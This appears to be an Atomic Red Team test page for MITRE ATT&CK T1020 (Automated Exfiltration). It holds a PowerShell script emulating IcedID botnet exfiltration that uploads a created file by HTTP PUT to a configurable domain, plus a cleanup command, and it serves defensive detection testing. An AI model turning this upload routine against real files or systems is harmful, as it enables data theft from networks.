Skip to content

Latest commit

 

History

History
52 lines (31 loc) · 1.54 KB

T1020.md

File metadata and controls

52 lines (31 loc) · 1.54 KB
Raw

T1020 - Automated Exfiltration

Description from ATT&CK

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.

Atomic Tests


Atomic Test #1 - IcedID Botnet HTTP PUT

Creates a text file Tries to upload to a server via HTTP PUT method with ContentType Header Deletes a created file

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
file Exfiltration File String C:\temp\T1020_exfilFile.txt
domain Destination Domain url https://google.com

Attack Commands: Run with powershell!

$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}

Cleanup Commands:

$fileName = "#{file}"
Remove-Item -Path $fileName -ErrorAction Ignore